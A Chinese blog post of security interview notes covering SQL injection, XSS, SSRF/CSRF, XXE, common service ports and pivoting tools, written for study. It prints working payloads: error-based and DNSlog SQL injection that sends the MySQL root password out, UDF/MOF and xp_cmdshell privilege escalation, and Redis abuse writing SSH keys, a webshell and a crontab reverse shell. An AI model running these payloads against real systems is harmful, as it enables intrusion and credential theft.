ctf

安全面试总结1

2018-07-13  本文已影响179人  SunJ3t

这是我在面试中被问到一些问题,主要偏向基础知识,如有错误,还望指正。

1. sql注入

1. 原理

攻击者通过构造一些恶意的SQL语句,让后台的数据库去解析,从而达到入侵目标网络,获取敏感信息

2. sql注入分类

  1. 主要分为以下两类:
  1. 细分的话可以分为:

3. 利用方式

  1. 主要分为以下三类:

4. 报错注入可以利用的函数

  1. 利用floor()函数
mysql> select * from users where id = 1 and (select 1 from (select count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)b);
  1. 利用updatexml()函数
mysql> select * from users where id = 1 and updatexml(1,concat(0x7e,database(),0x7e),1);
  1. 利用extractvalue()函数
mysql> select * from users where id = 1 and extractvalue(1,concat(0x7e,database(),0x7e));

ps:如果concat被过滤,则可能使用make_set函数来实现

mysql> select * from users where id = 1 and updatexml(1,make_set(3,0x7e,database()),1);
mysql> select * from users where id = 1 and extractvalue(1,make_set(3,0x7e,database()));
  1. 利用join()函数
mysql> select * from(select * from users a join users b)c;
  1. 利用几何函数
    例如geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()
and geometrycollection((select * from(select * from(select user())a)b));
  1. 利用exp()函数
select exp(~(select*from(select database())x));

5. 报错注入函数有哪些限制要求

  1. floor函数()
    需要同时满足floor(rand(0)*2),count(*),group by这三个函数
    • updatexml()和extractvalue()函数
      mysql5.1.5,最多爆出32位的
    • exp()函数
      在MySQL版本大于等于5.5.5的的时候才能用户

6. sql注入读写文件

  1. load_file()

7. sql防御

  1. 参数过滤
  2. 预编译处理
  3. ODBC
  4. PDO

8. 解释下sql预编译处理

  1. 执行预编译语句
  2. 设置变量
  3. 执行语句

先执行了sql语句,再把参数传入,即使参数有sql命令也不会被执行

9. sql过滤绕过

  1. 过滤空格
  1. 过滤等号
  1. 过滤引号
  1. 过滤尖括号
  1. 过滤逗号
  1. 过滤or,and
  1. 过滤注释符号
  1. 过滤符号

10. DNSlog注入限制

必须是Windows系统,使用的load_file函数

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 0,1),'.b182oj.ceye.io\\abc’));

11. MySQL提权

  1. udf提权

    • udf概念
      UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码。
    • 适用场合
      • 目标主机系统是Windows。
      • 拥有该主机mysql中的某个用户账号,该账号需要有对mysql的insert和delete权限。
    • 注意事项
      • mysql版本大于等于5.1 udf.dll需要导入到plugin_dir目录
      • mysql版本小与5.1 udf.dll需要导入到C:\windows\目录
    • 使用sql语句创建功能函数
    create function shell returns string soname 'udf.dll' 
    
  2. mof提权

    • mof概念
      mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)
    • 步骤
      • 将mof上传至任意可读可写目录下,假如传到D:\wamp\下命名为:test.mof。也就是:D:\wamp\test.mof
      • 然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。
      • 替换的sql语句:select load_file('D:\wamp\test.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

2. XSS攻击

1. XSS分类

  1. 反射型XSS
  2. 存储型XSS
  3. DOM型XSS

2. 它们的差别

  1. 反射型XSS和存储型XSS都是服务端代码漏洞
  2. 存储型XSS会在服务端存储输入的内容
  3. DOM型XSS是前端代码漏洞

3. XSS危害

  1. 偷取用户Cookie
  2. 弹出广告
  3. 网络钓鱼

4. XSS过滤

  1. 大小写混写
  2. 多重嵌套
  3. 宽字节绕过

5. XSS一般会用到哪些标签

1. <javascript>
2. <iframe src=http://xxxx.xx>
3. <img src=javascript:alert('xss')>
4. <body onload=alert('xss')>
5. <body background=javascript:alert('xss')>
6. <input type="image" src="javascript:alert('xss')">
7. ...

6. XSS有效的绕过手段

  1. href属性中的伪协议
<a href=javascript:alert('/a/')>adas</a>
  1. 利用HTML5新增标签
<math>标签
<embed>标签
  1. 利用DataUrl协议,引用外域的资源

7. 有哪些XSS环境

  1. XSS输出在HTML中的情况
  2. XSS输出在HTML属性中的情况
  3. XSS输出在script标签中的情况
  4. XSS在input value中的情况
  5. XSS输出在textarea中的情况
  6. XSS通过innerHTML输出的情况
  7. XSS通过eval执行的情况
  8. XSS Flash
  9. ...

8. 防护

  1. 过滤+实体化编码
    常用htmlspecialchars()函数进行编码
  2. 设置httponly

3. 请求伪造漏洞与防护

1. CSRF的防护方案

  1. 添加验证过程
  2. 添加验证码
  3. 验证referer
  4. 利用token

2. SSRF可实现的攻击效果

  1. 对内网web应用特征进行发现
  2. 对服务器所在内网进行各类信息探测
  3. 利用file协议读取本地文件
  4. 针对特定目标进行攻击时隐藏攻击发起地址

3. SSRF常见绕过技巧

  1. 利用@符号
  2. 利用localhost
  3. 利用短地址
  4. 利用特殊域名
如 10.0.0.1.Xip.io = 10.0.0.1
  1. 利用DNS解析
  2. 利用Enclosed alphanumerics
  3. 利用。
  4. 利用进制转换
127.0.0.1 = 2130706433D = 7F000001
  1. 其他协议
dict://<user-auth>@<host>:<port>/d:<word>
ssrf.php?url=sftp://example.com:11111/
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

4. 渗透工具

1. sqlmap

  1. --os-shell解析
    用into outfile函数写一个上传页面,执行条件有三个:
    • 网站必须是root权限
    • 攻击者需要做的网站的绝对路径
    • GPC为off,php主动转义的功能关闭

2. brupsuite

  1. Intruder模块--暴力破解

5. 中间件

1. MSSQL利用

  1. MSSQL差异备份
backup database 库名 to disk = 'c:\aa.bak';-- 
create table [dbo].[dtest] ([cmd] [image]);-- insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
backup database test to disk='c:\aa.bak' WITH DIFFERENTIAL,FORMAT;--
  1. MSSQL-xp_cmdshell利用
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'
EXEC sp_configure 'show advanced options', 0;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  1. MSSQL job

2. redis综合利用

  1. 未授权写入SSH公钥
    利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。
$ssh-keygen –t rsa
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.1.11:6379> config set dir /root/.ssh/
OK
$ 192.168.1.11:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.11:6379> save
OK
  1. 未授权写入WebShell
config set dir /home/wwwroot/default/
config set dbfilename redis.php
set webshell "<?php phpinfo(); ?>”
save
  1. 未授权写入Crontab计划任务
# redis-cli -h 192.168.1.20
192.168.1.20:6379>CONFIG SET dir /var/spool/cron 
OK
192.168.1.20:6379>CONFIG SET dbfilename root   
OK
192.168.1.20:6379>set payload "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.160/9999 0>&1\n\n"
OK
192.168.1.20:6379>save 
OK
192.168.1.20:6379>exit

6. 常用端口

端口 服务 说明
21 FTP 主要看是否支持匿名,也可跑弱口令
22 SSH 弱口令爆破
23 Telnet 弱口令爆破
80-90 Web 常见Web漏洞以及一些为管理后台
135 RPC 通过远程调用执行代码
137 NetBIOS 获取目标计算机的相关信息
161 Snmp public弱口令
389 Idap 是否为匿名访问
443 Openssl 心脏出血以及一些Web漏洞测试
445 Smb 跑弱口令,检测是否有ms_08067等溢出
873 Rsync 是否为匿名访问,也可以跑弱口令
1025 Listen port 获取Windows网络的服务器信息与用户信息
1099 Java rmi 远程命令执行漏洞
1433 Mssql 弱口令爆破
1521 Oracle 弱口令爆破
2082/2083 Cpanel主机管理系统登录 弱口令爆破
2222 DA虚拟主机管理系统登录 默认密码zebra
2601/2604 zebra路由器 说明
3128 Squid代理默认端口 如果没设置口令很可能 就直接漫游内网
3306 Mysql 弱口令爆破
3312/3311 Kangle主机管理系统登陆 说明
3389 RDP 弱口令爆破,SHIFT后门,放大镜,输入法漏洞
4440 Rundeck Web
4848 GlassFish Web中间件 弱口令admin/adminadmin
5432 Postgres 弱口令爆破
5560/7778 iSqlPlus
5900/5901/5902 Vnc 弱口令爆破
6379 Redis 一般无验证,直接访问
7001/7002 Weblogic 弱口令爆破
7778 Kloxo主机控制面板登录
8080 Tomcat/Jboss 弱口令爆破,jboss后台可能不验证
8649 Ganglia
8080-8090 常见WEB端口
8888 Amh/LuManager 主机管理系统默认端口 说明
9000 Fcgi fcgi php命令执行漏洞
9200 Elasticsearch 代码执行
9043 Websphere 弱口令爆破
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 Memcache 内存泄露
27017/28017 Mongodb 未授权访问
50060/50030 Hadoop WEB

7. XXE

1. XXE介绍

XXE全称XML外部实体注入(XML External Entity)形成的原因大都是由于允许引用外部实体。

2. XXE危害

  1. 读取任意文件
  2. 执行系统命令
  3. 探测内网端口
  4. 攻击内网网站
  5. ...

3. 调用

  1. 通过&来调用实体值
  2. 外部调用在实体后面加SYSTEM
  3. 如果实体前加了%,那么调用实体时也需要使用%

8. 内网基础

1. 端口转发及代理类

  1. pipe:windows下面的端口转发软件,比较老牌的工具,使用场景有限。
  2. sockscap:老牌的socks代理工具,主要针对windows平台的端口转发和代理转发。
  3. proxifier:跨平台的端口转发和代理工具,适用windows,linux,Macos平台,代理转发利器
  4. Rsscoks:linux平台下的端口转发和代理工具,配合proxychains好用到不行。
  5. Proxychains:linux平台下老牌的socks代理工具,一般的系统都会自带,谁用谁知道。
  6. ssh proxy:通过ssh做端口代理和转发,一般linux系统都自带。
  7. netcat:socat,hping,在很多情况下可以做端口转发和数据代理转发。
  8. metasploit:metasploit的后渗透模块中有不少代理模块和端口转发模块。

2. 正向代理和反向代理

  1. 正向代理
    就是client连上server,然后把server能访问的机器地址和端口(当然也包括server自己)镜像到client的端口上。

  2. 反向代理
    就是client连上server,然后把client能访问的机器地址和端口(也包括client自己)镜像到server的端口上。

  3. 用ssh做socks代理
    ssh -D [本地IP或省略]:[本地端口] [登陆服务器的用户名@服务器IP] -p [服务器ssh服务端口(默认22)]

  4. 区别

上一篇下一篇

猜你喜欢

热点阅读